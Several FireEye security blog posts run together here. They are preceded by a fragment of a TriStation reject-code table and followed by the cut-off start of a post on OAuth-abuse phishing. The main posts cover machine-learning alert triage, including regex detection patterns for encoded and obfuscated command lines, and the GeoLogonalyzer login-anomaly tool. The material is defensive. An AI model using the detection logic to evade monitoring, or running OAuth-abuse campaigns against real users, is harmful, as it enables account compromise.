8C | 140: 'Get calendar response',
8D | 141: 'Label set',
8E | 142: 'Get module types response',
8F | 143: 'System variables configured',
90 | 144: 'Module deconfigured',
91 | 145: '<145>',
92 | 146: '<146>',
93 | 147: 'Get conversion table response',
94 | 148: 'ICM print data sent',
95 | 149: 'Set ICM status response',
96 | 150: 'Get system variables response',
97 | 151: 'Get module versions response',
98 | 152: 'Process MODBUS response',
99 | 153: 'Allocate program response',
9A | 154: 'Allocate function response',
9B | 155: 'Clear retentives response',
9C | 156: 'Set initial values response',
9D | 157: 'Set TS2 data area response',
9E | 158: 'Get TS2 data response',
9F | 159: 'Set TS2 data response',
A0 | 160: 'Set program information reponse',
A1 | 161: 'Get program information response',
A2 | 162: 'Upload program response',
A3 | 163: 'Upload function response',
A4 | 164: 'Get point groups response',
A5 | 165: 'Allocate symbol table response',
A6 | 166: 'Program timing response',
A7 | 167: 'Disable points full',
A8 | 168: 'Allocate multiple functions response',
A9 | 169: 'Get node number response',
AA | 170: 'Symbol table response',
AB-C7 | (no dictionary entries)
C8 | 200: 'Wrong command',
C9 | 201: 'Load is in progress',
CA | 202: 'Bad clock calendar data',
CB | 203: 'Control program not halted',
CC | 204: 'Control program checksum error',
CD | 205: 'No memory available',
CE | 206: 'Control program not valid',
CF | 207: 'Not loading a control program',
D0 | 208: 'Network is out of range',
D1 | 209: 'Not enough arguments',
D2 | 210: 'A Network is missing',
D3 | 211: 'The download time mismatches',
D4 | 212: 'Key setting prohibits this operation',
D5 | 213: 'Bad control program version',
D6 | 214: 'Command not in correct sequence',
D7 | 215: '<215>',
D8 | 216: 'Bad Index for a module',
D9 | 217: 'Module address is invalid',
DA | 218: '<218>',
DB | 219: '<219>',
DC | 220: 'Bad offset for an I/O point',
DD | 221: 'Invalid point type',
DE | 222: 'Invalid Point Location',
DF | 223: 'Program name is invalid',
E0 | 224: '<224>',
E1 | 225: '<225>',
E2 | 226: '<226>',
E3 | 227: 'Invalid module type',
E4 | 228: '<228>',
E5 | 229: 'Invalid table type',
E6 | 230: '<230>',
E7 | 231: 'Invalid network continuation',
E8 | 232: 'Invalid scan time',
E9 | 233: 'Load is busy',
EA | 234: 'An MP has re-educated',
EB | 235: 'Invalid chassis or slot',
EC | 236: 'Invalid SOE number',
ED | 237: 'Invalid SOE type',
EE | 238: 'Invalid SOE state',
EF | 239: 'The variable is write protected',
F0 | 240: 'Node number mismatch',
F1 | 241: 'Command not allowed',
F2 | 242: 'Invalid sequence number',
F3 | 243: 'Time change on non-master TRICON',
F4 | 244: 'No free Tristation ports',
F5 | 245: 'Invalid Tristation I command',
F6 | 246: 'Invalid TriStation 1131 command',
F7 | 247: 'Only one chassis allowed',
F8 | 248: 'Bad variable address',
F9 | 249: 'Response overflow',
FA | 250: 'Invalid bus',
FB | 251: 'Disable is not allowed',
FC | 252: 'Invalid length',
FD | 253: 'Point cannot be disabled',
FE | 254: 'Too many retentive variables',
FF | 255: 'LOADER_CONNECT',
(none) | 256: 'Unknown reject code'

Reverse Engineering the Analyst: Building Machine Learning Models for the SOC

Many cyber incidents can be traced back to an original alert that was either missed or ignored by the Security Operations Center (SOC) or Incident Response (IR) team. While most analysts and SOCs are vigilant and responsive, the fact is they are often overwhelmed with alerts. If a SOC is unable to review all the alerts it generates, then sooner or later, something important will slip through the cracks.

The core issue here is scalability. It is far easier to create more alerts than to create more analysts, and the cyber security industry is far better at alert generation than resolution. More intel feeds, more tools, and more visibility all add to the flood of alerts. There are things that SOCs can and should do to manage this flood, such as increasing automation of forensic tasks (pulling PCAP and acquiring files, for example) and using aggregation filters to group alerts into similar batches. These are effective strategies and will help reduce the number of required actions a SOC analyst must take. However, the decisions the SOC makes still form a critical bottleneck. This is the “Analyze/Decide” block in Figure 1.


Figure 1: Basic SOC triage stages

In this blog post, we propose machine learning based strategies to help mitigate this bottleneck and take back control of the SOC. We have implemented these strategies in our FireEye Managed Defense SOC, and our analysts are taking advantage of this approach within their alert triaging workflow. In the following sections, we will describe our process to collect data, capture alert analysis, create a model, and build an efficacy workflow – all with the ultimate goal of automating alert triage and freeing up analyst time.

Reverse Engineering the Analyst

Every alert that comes into a SOC environment contains certain bits of information that an analyst uses to determine if the alert represents malicious activity. Often, there are well-paved analytical processes and pathways used when evaluating these forensic artifacts over time. We wanted to explore if, in an effort to truly scale our SOC operations, we could extract these analytical pathways, train a machine to traverse them, and potentially discover new ones.

Think of a SOC as a self-contained machine that inputs unlabeled alerts and outputs the alerts labeled as “malicious” or “benign”. How can we capture the analysis and determine that something is indeed malicious, and then recreate that analysis at scale? In other words, what if we could train a machine to make the same analytical decisions as an analyst, within an acceptable level of confidence?

Basic Supervised Model Process

The data science term for this is a “Supervised Classification Model”. It is “supervised” in the sense that it learns by being shown data already labeled as benign or malicious, and it is a “classification model” in the sense that once it has been trained, we want it to look at a new piece of data and make a decision between one of several discrete outcomes. In our case, we only want it to decide between two “classes” of alerts: malicious and benign.

In order to begin creating such a model, a dataset must be collected. This dataset forms the “experience” of the model, and is the information we will use to “train” the model to make decisions. In order to supervise the model, each unit of data must be labeled as either malicious or benign, so that the model can evaluate each observation and begin to figure out what makes something malicious versus what makes it benign. Typically, collecting a clean, labeled dataset is one of the hardest parts of the supervised model pipeline; however, in the case of our SOC, our analysts are constantly triaging (or “labeling”) thousands of alerts every week, and so we were lucky to have an abundance of clean, standardized, labeled alerts.

Once a labeled dataset has been defined, the next step is to define “features” that can be used to portray the information resident in each alert. A “feature” can be thought of as an aspect of a bit of information. For example, if the information is represented as a string, a natural “feature” could be the length of the string. The central idea behind building features for our alert classification model was to find a way to represent and record all the aspects that an analyst might consider when making a decision.

Building the model then requires choosing a model structure to use, and training the model on a subset of the total data available. The larger and more diverse the training data set, generally the better the model will perform. The remaining data is used as a “test set” to see if the trained model is indeed effective. Holding out this test set ensures the model is evaluated on samples it has never seen before, but for which the true labels are known.

Finally, it is critical to ensure there is a way to evaluate the efficacy of the model over time, as well as to investigate mistakes so that appropriate adjustments can be made. Without a plan and a pipeline to evaluate and retrain, the model will almost certainly decay in performance.

Feature Engineering

Before creating any of our own models, we interviewed experienced analysts and documented the information they typically evaluate before making a decision on an alert. Those interviews formed the basis of our feature extraction. For example, when an analyst says that reviewing an alert is “easy”, we ask: “Why? And what helps you make that decision?” It is this reverse engineering of sorts that gives insight into features and models we can use to capture analysis.

For example, consider a process execution event. An alert on a potentially malicious process execution may contain the following fields:

  • Process Path
  • Process MD5
  • Parent Process
  • Process Command Arguments

While this may initially seem like a limited feature space, there is a lot of useful information that one can extract from these fields.

Beginning with the process path of, say, “C:\windows\temp\m.exe”, an analyst can immediately see some features:

  • The process resides in a temporary folder: C:\windows\temp\
  • The process is two directories deep in the file system
  • The process executable name is one character long
  • The process has an .exe extension
  • The process is not a “common” process name

While these may seem simple, over a vast amount of data and examples, extracting these bits of information will help the model to differentiate between events. Even the most basic aspects of an artifact must be captured in order to “teach” the model to view processes the way an analyst does.

The features are then encoded into a more discrete representation, similar to this:

Temp_folder | Depth | Name_Length | Extension | common_process_name
TRUE | 2 | 1 | exe | FALSE
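
A minimal sketch of how those path features might be extracted and encoded is shown below; it assumes nothing beyond the process path itself, and the list of "common" process names is an illustrative placeholder.

    import ntpath

    COMMON_PROCESS_NAMES = {"svchost.exe", "explorer.exe", "chrome.exe"}  # illustrative allow-list

    def path_features(process_path):
        """Encode simple features of a Windows process path."""
        directory, filename = ntpath.split(process_path.lower())
        name, extension = ntpath.splitext(filename)
        return {
            "temp_folder": "\\temp" in directory,      # resides under a temp directory
            "depth": directory.count("\\"),            # directories deep in the file system
            "name_length": len(name),                  # length of the executable name
            "extension": extension.lstrip("."),        # file extension
            "common_process_name": filename in COMMON_PROCESS_NAMES,
        }

    print(path_features(r"C:\windows\temp\m.exe"))
    # {'temp_folder': True, 'depth': 2, 'name_length': 1, 'extension': 'exe', 'common_process_name': False}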

Another important feature to consider about a process execution event is the combination of parent process and child process. Deviation from expected “lineage” can be a strong indicator of malicious activity.

Say the parent process of the aforementioned example was ‘powershell.exe’. Potential new features could then be derived from the concatenation of the parent process and the process itself: ‘powershell.exe_m.exe’. This functionally serves as an identity for the parent-child relation and captures another key analysis artifact.

The richest field, however, is probably the process arguments. Process arguments are their own sort of language, and language analysis is a well-trodden space in predictive analytics.

We can look for things including, but not limited to (a rough feature-extraction sketch follows this list):

  • Network connection strings (such as ‘http://’, ‘https://’, ‘ftp://’).
  • Base64 encoded commands
  • Reference to Registry Keys (‘HKLM’, ‘HKCU’)
  • Evidence of obfuscation (ticks, $, semicolons) (read Daniel Bohannon’s work for more)
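
A rough sketch of how these command argument indicators could be turned into boolean features is shown below; the regular expressions are illustrative and intentionally loose, not the exact patterns used in our pipeline.

    import re

    # Regexes for the indicators listed above; patterns are illustrative, not exhaustive.
    INDICATORS = {
        "network_string": re.compile(r"(https?|ftp)://", re.IGNORECASE),
        "base64_blob": re.compile(r"[A-Za-z0-9+/]{40,}={0,2}"),       # long base64-looking token
        "registry_reference": re.compile(r"\b(HKLM|HKCU)\b", re.IGNORECASE),
        "obfuscation_chars": re.compile(r"[`$;]"),                    # ticks, $, semicolons
    }

    def argument_features(command_line):
        """Return one boolean feature per indicator for a process command line."""
        return {name: bool(pattern.search(command_line)) for name, pattern in INDICATORS.items()}

    # Arbitrary example command line with an encoded argument.
    print(argument_features("powershell -enc aHR0cDovL2V4YW1wbGUuY29tL2EvYi9jL2QvZS9mL2cvaC9pLmV4ZQ=="))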

The way these features and their values appear in a training dataset will define the way the model learns. Based on the distribution of features across thousands of alerts, relationships will start to emerge between features and labels. These relationships will then be recorded in our model, and ultimately used to influence the predictions for new alerts. Looking at distributions of features in the training set can give insight into some of these potential relationships.

For example, Figure 2 shows how the distribution of Process Command Length may appear when grouping by malicious (red) and benign (blue).


Figure 2: Distribution of Process Event alerts grouped by Process Command Length

This graph shows that over a subset of samples, the longer the command length, the more likely it is to be malicious. This manifests as red on the right and blue on the left. However, process length is not the only factor.

As part of our feature set, we also thought it would be useful to approximate the “complexity” of each command. For this, we used “Shannon entropy”, a commonly used metric that measures the degree of randomness present in a string of characters.
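
For reference, Shannon entropy over the characters of a command line can be computed in a few lines of Python; this is a generic implementation rather than the exact code used in our pipeline.

    import math
    from collections import Counter

    def shannon_entropy(text):
        """Shannon entropy in bits per character: -sum(p * log2(p)) over character frequencies."""
        if not text:
            return 0.0
        counts = Counter(text)
        total = len(text)
        return -sum((n / total) * math.log2(n / total) for n in counts.values())

    # Compare a short plain command with an encoded one.
    print(shannon_entropy("cmd.exe /c whoami"))
    print(shannon_entropy("powershell -enc KABOcgBlAHcALQBPAGIA"))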

Figure 3 shows a distribution of command entropy, broken out into malicious and benign. While the classes do not separate entirely, we can see that for this sample of data, samples with higher entropy generally have a higher chance of being malicious.


Figure 3: Distribution of Process Event alerts grouped by entropy

Model Selection and Generalization

Once features have been generated for the whole dataset, it is time to use them to train a model. There is no perfect procedure for picking the best model, but looking at the type of features in our data can help narrow it down. In the case of a process event, we have a combination of features represented as strings and numbers. When an analyst evaluates each artifact, they ask questions about each of these features, and combine the answers to estimate the probability that the process is malicious.

For our use case, it also made sense to prioritize an ‘interpretable’ model – that is, one that can more easily expose why it made a certain decision about an artifact. This way analysts can build confidence in the model, as well as detect and fix analytical mistakes that the model is making. Given the nature of the data, the decisions analysts make, and the desire for interpretability, we felt that a decision tree-based model would be well-suited for alert classification.

There are many publicly available resources to learn about decision trees, but the basic intuition behind a decision tree is that it is an iterative process, asking a series of questions to try to arrive at a highly confident answer. Anyone who has played the game “Twenty Questions” is familiar with this concept. Initially, general questions are asked to help eliminate possibilities, and then more specific questions are asked to narrow down the possibilities. After enough questions are asked and answered, the ‘questioner’ feels they have a high probability of guessing the right answer.

Figure 4 shows an example of a decision tree that one might use to evaluate process executions.


Figure 4: Decision tree for deciding whether an alert is benign or malicious

For the example alert in the diagram, the “decision path” is marked in red. This is how this decision tree model makes a prediction. It first asks: “Is the length greater than 100 characters?” If so, it moves to the next question “Does it contain the string ‘http’?” and so on until it feels confident in making an educated guess. In the example in Figure 4, given that 95 percent of all the training alerts traveling this decision path were malicious, the model predicts a 95 percent chance that this alert will also be malicious.

Because they can ask such detailed combinations of questions, it is possible that decision trees can “overfit”, or learn rules that are too closely tied to the training set. This reduces the model’s ability to “generalize” to new data. One way to mitigate this effect is to use many slightly different decision trees and have them each “vote” on the outcome. This “ensemble” of decision trees is called a Random Forest, and it can improve performance for the model when deployed in the wild. This is the algorithm we ultimately chose for our model.
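
For readers who want a concrete starting point, a heavily simplified version of this training step is sketched below using scikit-learn's RandomForestClassifier. The input file, feature columns, and parameters are placeholders, and the real pipeline involves many more features and far more validation.

    import pandas as pd
    from sklearn.ensemble import RandomForestClassifier
    from sklearn.model_selection import train_test_split
    from sklearn.metrics import classification_report

    # Placeholder training data: one row per triaged alert, with a handful of the
    # encoded features described above and an analyst-assigned label (1 = malicious).
    alerts = pd.read_csv("labeled_process_alerts.csv")
    features = ["command_length", "command_entropy", "temp_folder", "depth", "common_process_name"]

    X_train, X_test, y_train, y_test = train_test_split(
        alerts[features], alerts["label"], test_size=0.2, random_state=0)

    # An ensemble of decision trees that each "vote" on the outcome.
    model = RandomForestClassifier(n_estimators=100, random_state=0)
    model.fit(X_train, y_train)

    # Evaluate on the held-out test set the model has never seen.
    print(classification_report(y_test, model.predict(X_test)))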

How the SOC Alert Model Works

When a new alert appears, the data in the artifact is transformed into a vector of the encoded features, with the same structure as the feature representations used to train the model. The model then evaluates this “feature vector” and applies a confidence level for the predicted label. Based on thresholds we set, we can then classify the alert as malicious or benign.


Figure 5: An alert presented to the analyst with its raw values captured

As an example, the event shown in Figure 5 might create the following feature values:

  • Parent Process: ‘wscript’
  • Command Entropy: 5.08
  • Command Length = 103

Based on how they were trained, the trees in the model each ask a series of questions of the new feature vector. As the feature vector traverses each tree, it eventually converges on a terminal “leaf” classifying it as either benign or malicious. We can then evaluate the aggregated decisions made by each tree to estimate which features in the vector played the largest role in the ultimate classification.

For the analysts in the SOC, we then present the features extracted from the model, showing the distribution of those features over the entire dataset. This gives the analysts insight into “why” the model thought what it thought, and how those features are represented across all alerts we have seen. For example, the “explanation” for this alert might look like:

  • Command Entropy = 5.08 > 4.60:  51.73% Threat
  • occuranceOfChar “\”= 9.00 > 4.50:  64.09% Threat
  • occuranceOfChar:“)” (=0.00) <= 0.50: 78.69% Threat
  • NOT processTree=”cmd.exe_to_cscript.exe”: 99.6% Threat

Thus, at the time of analysis, the analysts can see the raw data of the event, the prediction from the model, an approximation of the decision path, and a simplified, interpretable view of the overall feature importance.

How the SOC Uses the Model

Showing the features the model used to reach the conclusion allows experienced analysts to compare their approach with the model, and give feedback if the model is doing something wrong. Conversely, a new analyst may learn to look at features they may have otherwise missed: the parent-child relationship, signs of obfuscation, or network connection strings in the arguments. After all, the model has learned on the collective experience of every analyst over thousands of alerts. Therefore, the model provides an actionable reflection of the aggregate analyst experience back to the SOC, so that each analyst can transitively learn from their colleagues.

Additionally, it is possible to write rules using the output of the model as a parameter. If the model is particularly confident on a subset of alerts, and the SOC feels comfortable automatically classifying that family of threats, it is possible to simply write a rule to say: “If the alert is of this type, AND for this malware family, AND the model confidence is above 99, automatically call this alert bad and generate a report.” Or, if there is a storm of probable false positives, one could write a rule to cull the herd of false positives using a model score below 10.
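
A rule of that shape might look like the following sketch, where the malware family name and confidence thresholds are placeholders chosen only to mirror the example above.

    def triage_rule(alert, model_confidence):
        """Illustrative auto-triage rule driven by the model's confidence score (0-100)."""
        if alert.get("family") == "KNOWN_COMMODITY_FAMILY" and model_confidence > 99:
            return "auto-close: malicious, generate report"
        if model_confidence < 10:
            return "auto-close: probable false positive"
        return "route to analyst queue"

    print(triage_rule({"family": "KNOWN_COMMODITY_FAMILY"}, 99.5))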

How the Model Stays Effective

The day the model is trained, it stops learning. However, threats – and therefore alerts – are constantly evolving. Thus, it is imperative to continually retrain the model with new alert data to ensure it continues to learn from changes in the environment.

Additionally, it is critical to monitor the overall efficacy of the model over time. Building an efficacy analysis pipeline to compare model results against analyst feedback will help identify if the model is beginning to drift or develop structural biases. Evaluating and incorporating analyst feedback is also critical to identify and address specific misclassifications, and discover potential new features that may be necessary.

To accomplish these goals, we run a background job that updates our training database with newly labeled events. As we get more and more alerts, we periodically retrain our model with the new observations. If we encounter issues with accuracy, we diagnose and work to address them. Once we are satisfied with the overall accuracy score of our retrained model, we store the model object and begin using that model version.

We also provide a feedback mechanism for analysts to record when the model is wrong. An analyst can look at the label provided by the model and the explanation, but can also make their own decision. Whether they agree with the model or not, they can input their own label through the interface. We store the analyst's label along with any optional explanation they provide.

Finally, it should be noted that these manual labels may require further evaluation. As an example, consider a commodity malware alert, in which network command and control communications were sinkholed. An analyst may evaluate the alert, pull back triage details, including PCAP samples, and see that while the malware executed, the true threat to the environment was mitigated. Since it does not represent an exigent threat, the analyst may mark this alert as ‘benign’. However, the fact that it was sinkholed does not change that the artifacts of execution still represent malicious activity. Under different circumstances, this infection could have had a negative impact on the organization. However, if the benign label is used when retraining the model, that will teach the model that something inherently malicious is in fact benign, and potentially lead to false negatives in the future.

Monitoring efficacy over time, updating and retraining the model with new alerts, and evaluating manual analyst feedback gives us visibility into how the model is performing and learning over time. Ultimately this helps to build confidence in the model, so we can automate more tasks and free up analyst time to perform tasks such as hunting and investigation.

Conclusion

A supervised learning model is not a replacement for an experienced analyst. However, incorporating predictive analytics and machine learning into the SOC workflow can help augment the productivity of analysts, free up time, and ensure they utilize investigative skills and creativity on the threats that truly require expertise.

This blog post outlines the major components and considerations of building an alert classification model for the SOC. Data collection, labeling, feature generation, model training, and efficacy analysis must all be carefully considered when building such a model. FireEye continues to iterate on this research to improve our detection and response capabilities, continually improve the detection efficacy of our products, and ultimately protect our clients.

The processes and examples discussed in this post are not mere research. Within our FireEye Managed Defense SOC, we use alert classification models built using the aforementioned processes to increase our efficiency and ensure we apply our analysts’ expertise where it is needed most. In a world of ever increasing threats and alerts, increasing SOC efficiency may mean the difference between missing and catching a critical intrusion.

Acknowledgements

A big thank you to Seth Summersett and Clara Brooks.

***

The FireEye ICE Data Science Team is a small, highly trained team of data scientists and engineers, focused on delivering impactful capabilities to our analysts, products, and customers. ICE-DS is always looking for exceptional candidates interested in researching and solving difficult problems in cybersecurity. If you’re interested, check out  FireEye careers.

Remote Authentication GeoFeasibility Tool – GeoLogonalyzer

Users have long needed to access important resources such as virtual private networks (VPNs), web applications, and mail servers from anywhere in the world at any time. While the ability to access resources from anywhere is imperative for employees, threat actors often leverage stolen credentials to access systems and data. Due to large volumes of remote access connections, it can be difficult to distinguish between a legitimate and a malicious login.

Today, we are releasing GeoLogonalyzer to help organizations analyze logs to identify malicious logins based on GeoFeasibility; for example, a user connecting to a VPN from New York at 13:00 is unlikely to legitimately connect to the VPN from Australia five minutes later.

Once remote authentication activity is baselined across an environment, analysts can begin to identify authentication activity that deviates from business requirements and normalized patterns, such as:

  1. User accounts that authenticate from two distant locations, and at times between which the user probably could not have physically travelled the route.
  2. User accounts that usually log on from IP addresses registered to one physical location such as a city, state, or country, but also have logons from locations where the user is not likely to be physically located.
  3. User accounts that log on from a foreign location at which no employees reside or are expected to travel to, and your organization has no business contacts at that location.
  4. User accounts that usually log on from one source IP address, subnet, or ASN, but have a small number of logons from a different source IP address, subnet, or ASN.
  5. User accounts that usually log on from home or work networks, but also have logons from an IP address registered to cloud server hosting providers.
  6. User accounts that log on from multiple source hostnames or with multiple VPN clients.

GeoLogonalyzer can help address these and similar situations by processing authentication logs containing timestamps, usernames, and source IP addresses.

GeoLogonalyzer can be downloaded from our FireEye GitHub.

GeoLogonalyzer Features

IP Address GeoFeasibility Analysis

For a remote authentication log that records a source IP address, it is possible to estimate the location each logon originated from using data such as MaxMind’s free GeoIP database. With additional information, such as a timestamp and username, analysts can identify a change in source location over time to determine if that user could have possibly traveled between those two physical locations to legitimately perform the logons.

For example, if a user account, Meghan, logged on from New York City, New York on 2017-11-24 at 10:00:00 UTC and then logged on from Los Angeles, California 10 hours later on 2017-11-24 at 20:00:00 UTC, that is roughly a 2,450 mile change over 10 hours. Meghan’s logon source change can be normalized to 245 miles per hour which is reasonable through commercial airline travel.

If a second user account, Harry, logged on from Dallas, Texas on 2017-11-25 at 17:00:00 UTC and then logged on from Sydney, Australia two hours later on 2017-11-25 at 19:00:00 UTC, that is roughly an 8,500 mile change over two hours. Harry’s logon source change can be normalized to 4,250 miles per hour, which is likely infeasible with modern travel technology.

By focusing on the changes in logon sources, analysts do not have to manually review the many times that Harry might have logged in from Dallas before and after logging on from Sydney.
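GeoLogonalyzer performs this normalization for you, but the idea is easy to reproduce. The following minimal sketch (not GeoLogonalyzer's actual code) assumes you already have latitude/longitude pairs for each logon, for example from a MaxMind GeoIP lookup, and applies a standard haversine great-circle calculation:

from datetime import datetime
from math import radians, sin, cos, asin, sqrt

def haversine_miles(lat1, lon1, lat2, lon2):
    # Great-circle distance between two coordinate pairs, in statute miles.
    lat1, lon1, lat2, lon2 = map(radians, (lat1, lon1, lat2, lon2))
    a = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 3959 * 2 * asin(sqrt(a))  # Earth radius of roughly 3,959 miles

def required_speed_mph(first, second):
    # first and second are (timestamp, latitude, longitude) tuples for consecutive logons.
    (t1, lat1, lon1), (t2, lat2, lon2) = first, second
    hours = (t2 - t1).total_seconds() / 3600.0
    distance = haversine_miles(lat1, lon1, lat2, lon2)
    return distance / hours if hours else float("inf")

dallas = (datetime(2017, 11, 25, 17, 0), 32.78, -96.80)
sydney = (datetime(2017, 11, 25, 19, 0), -33.87, 151.21)
print(round(required_speed_mph(dallas, sydney)))

For the Dallas-to-Sydney example, the required rate works out to several thousand miles per hour, which immediately stands out during review.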

Cloud Data Hosting Provider Analysis

Attackers understand that organizations may either be blocking or looking for connections from unexpected locations. One solution for attackers is to establish a proxy on either a compromised server in another country, or even through a rented server hosted in another country by companies such as AWS, DigitalOcean, or Choopa.

Fortunately, GitHub user “client9” tracks many datacenter hosting providers in an easily digestible format. With this information, we can attempt to detect attackers who use datacenter proxies to thwart GeoFeasibility analysis.
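As a rough illustration (not GeoLogonalyzer's implementation), a source IP can be checked against a locally saved copy of such a datacenter CIDR list with Python's ipaddress module; the file name and one-network-per-line format below are assumptions:

import ipaddress

def load_datacenter_networks(path="datacenters.txt"):
    # One CIDR per line, e.g. a saved copy of a datacenter hosting provider list.
    networks = []
    with open(path) as handle:
        for line in handle:
            line = line.strip()
            if line and not line.startswith("#"):
                networks.append(ipaddress.ip_network(line, strict=False))
    return networks

def is_datacenter_ip(ip, networks):
    addr = ipaddress.ip_address(ip)
    return any(addr in network for network in networks)

networks = load_datacenter_networks()
print(is_datacenter_ip("203.0.113.25", networks))  # True if the IP falls within a listed range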

Using GeoLogonalyzer

Usable Log Sources

GeoLogonalyzer is designed to process remote access platform logs that include a timestamp, username, and source IP. Applicable log sources include, but are not limited to:

  1. VPN
  2. Email client or web applications
  3. Remote desktop environments such as Citrix
  4. Internet-facing applications
Usage

GeoLogonalyzer’s built-in --csv input type accepts CSV formatted input with the following considerations:

  1. Input must be sorted by timestamp.
  2. Input timestamps must all be in the same time zone, preferably UTC, to avoid seasonal changes such as daylight savings time.
  3. Input format must match the following CSV structure, which will likely require manual parsing or reformatting of existing log formats:

YYYY-MM-DD HH:MM:SS, username, source IP, optional source hostname, optional VPN client details

GeoLogonalyzer’s code comments include instructions for adding customized log format support. Due to the various VPN log formats exported from VPN server manufacturers, version 1.0 of GeoLogonalyzer does not include support for raw VPN server logs.
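As a hedged example of that reformatting step, the sketch below converts a hypothetical export with columns named time, user, and src_ip into the expected structure; real exports will use different column names and timestamp formats:

import csv
from datetime import datetime

# Hypothetical input columns: time, user, src_ip. Adjust the names and the
# timestamp format string to match your actual export.
with open("vpn_export.csv", newline="") as src, open("VPNLogs.csv", "w", newline="") as dst:
    reader = csv.DictReader(src)
    writer = csv.writer(dst)
    rows = []
    for row in reader:
        stamp = datetime.strptime(row["time"], "%m/%d/%Y %H:%M:%S")
        rows.append([stamp.strftime("%Y-%m-%d %H:%M:%S"), row["user"], row["src_ip"]])
    for row in sorted(rows, key=lambda r: r[0]):  # input must be sorted by timestamp
        writer.writerow(row)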

GeoLogonalyzer Usage

Example Input

Figure 1 represents an example input VPNLogs.csv file that recorded eight authentication events for the two user accounts Meghan and Harry. The input data is commonly derived from logs exported directly from an application administration console or SIEM.  Note that this example dataset was created entirely for demonstration purposes.


Figure 1: Example GeoLogonalyzer input

Example Windows Executable Command

GeoLogonalyzer.exe --csv VPNLogs.csv --output GeoLogonalyzedVPNLogs.csv

Example Python Script Execution Command

python GeoLogonalyzer.py --csv VPNLogs.csv --output GeoLogonalyzedVPNLogs.csv

Example Output

Figure 2 represents the example output GeoLogonalyzedVPNLogs.csv file, which shows relevant data from the authentication source changes (highlights have been added for emphasis and some columns have been removed for brevity):


Figure 2: Example GeoLogonalyzer output

Analysis

In the example output from Figure 2, GeoLogonalyzer helps identify the following anomalies in the Harry account’s logon patterns:

  1. FAST - For Harry to physically log on from New York and subsequently from Australia in the recorded timeframe, Harry needed to travel at a speed of 4,297 miles per hour.
  2. DISTANCE – Harry’s 8,990 mile trip from New York to Australia might not be expected travel.
  3. DCH – Harry’s logon from Australia originated from an IP address associated with a datacenter hosting provider.
  4. HOSTNAME and CLIENT – Harry logged on from different systems using different VPN client software, which may be against policy.
  5. ASN – Harry’s source IP addresses did not belong to the same ASN. Using ASN analysis helps cut down on reviewing logons with different source IP addresses that belong to the same provider. Examples include logons from different campus buildings or an updated residential IP address.

Manual analysis of the data could also reveal anomalies such as:

  1. Countries or regions where no business takes place, or where there are no employees located
  2. Datacenters that are not expected
  3. ASN names that are not expected, such as a university
  4. Usernames that should not log on to the service
  5. Unapproved VPN client software names
  6. Hostnames that are not part of the environment, do not match standard naming conventions, or do not belong to the associated user

While it may be impossible to determine if a logon pattern is malicious based on this data alone, analysts can use GeoLogonalyzer to flag and investigate potentially suspicious logon activity through other investigative methods.

GeoLogonalyzer Limitations

Reserved Addresses

Any RFC1918 source IP addresses, such as 192.168.X.X and 10.X.X.X, will not have a physical location registered in the MaxMind database. By default, GeoLogonalyzer will use the coordinates (0, 0) for any reserved IP address, which may alter results. Analysts can manually edit these coordinates, if desired, by modifying the RESERVED_IP_COORDINATES constant in the Python script.

Setting this constant to the coordinates of your office location may provide the most accurate results, although this may not be feasible if your organization has multiple locations or other point-to-point connections.

GeoLogonalyzer also accepts the --skip_rfc1918 parameter, which will completely ignore any RFC1918 source IP addresses and could result in missed activity.
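For reference, reserved source addresses are easy to identify before analysis with Python's ipaddress module; a minimal check (which may differ from GeoLogonalyzer's own handling) looks like this:

import ipaddress

def is_reserved(ip):
    # is_private covers the RFC1918 ranges (10.0.0.0/8, 172.16.0.0/12,
    # 192.168.0.0/16) along with other non-routable blocks.
    return ipaddress.ip_address(ip).is_private

print(is_reserved("10.20.30.40"))   # True: no GeoIP location will be available
print(is_reserved("198.51.100.7"))  # False: public address, can be geolocated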

Failed Logon and Logoff Data

It may also be useful to include failed logon attempts and logoff records with the log source data to see anomalies related to source information of all VPN activity. At this time, GeoLogonalyzer does not distinguish between successful logons, failed logon attempts, and logoff events. GeoLogonalyzer also does not detect overlapping logon sessions from multiple source IP addresses.

False Positive Factors

Note that the use of VPN or other tunneling services may create false positives. For example, a user may access an application from their home office in Wyoming at 08:00 UTC, connect to a VPN service hosted in Georgia at 08:30 UTC, and access the application again through the VPN service at 09:00 UTC. GeoLogonalyzer would process this application access log and detect that the user account required a FAST travel rate of roughly 1,250 miles per hour, which may appear malicious. Establishing a baseline of legitimate authentication patterns is recommended to understand false positives.

Reliance on Open Source Data

GeoLogonalyzer relies on open source data to make cloud hosting provider determinations. These lookups are only as accurate as the available open source data.

Preventing Remote Access Abuse

Understanding that no single analysis method is perfect, the following recommendations can help security teams prevent the abuse of remote access platforms and investigate suspected compromise.

  1. Identify and limit remote access platforms that allow access to sensitive information from the Internet, such as VPN servers, systems with RDP or SSH exposed, third-party applications (e.g., Citrix), intranet sites, and email infrastructure.
  2. Implement a multi-factor authentication solution that utilizes dynamically generated one-time use tokens for all remote access platforms.
  3. Ensure that remote access authentication logs for each identified access platform are recorded, forwarded to a log aggregation utility, and retained for at least one year.
  4. Whitelist IP address ranges that are confirmed as legitimate for remote access users based on baselining or physical location registrations. If whitelisting is not possible, blacklist IP address ranges registered to physical locations or cloud hosting providers that should never legitimately authenticate to your remote access portal.
  5. Utilize either SIEM capabilities or GeoLogonalyzer.py to perform GeoFeasibility analysis of all remote access at a regular frequency to establish a baseline of accounts that legitimately perform unexpected logon activity and identify new anomalies. Investigating anomalies may require contacting the owner of the user account in question. FireEye Helix analyzes live log data for all techniques utilized by GeoLogonalyzer, and more!

Download GeoLogonalyzer today.

Acknowledgements

Christopher Schmitt, Seth Summersett, Jeff Johns, and Alexander Mulfinger.

Shining a Light on OAuth Abuse with PwnAuth

Introduction

Spear phishing attacks are seen as one of the biggest cyber threats to an organization. It only takes one employee to enter their credentials or run some malware for an entire organization to become compromised. As such, companies devote significant resources to preventing credential harvesting and payload-driven social engineering attacks. Less attention, however, has been paid to a non-traditional, but just as dangerous, method of social engineering: OAuth abuse. In an OAuth abuse attack, a victim authorizes a third-party application to access their account. Once authorized, the application can access the user's data without needing credentials, bypassing any two-factor authentication that may be in place.

Today, I’m releasing PwnAuth, a platform to allow organizations and penetration testers an opportunity to test their ability to detect and respond to OAuth abuse social engineering campaigns. In releasing the tool, we hope to increase awareness about this threat, improve the security community’s ability to detect it, and provide countermeasures for defenders.

Head over to our GitHub to start using PwnAuth.

What is OAuth?

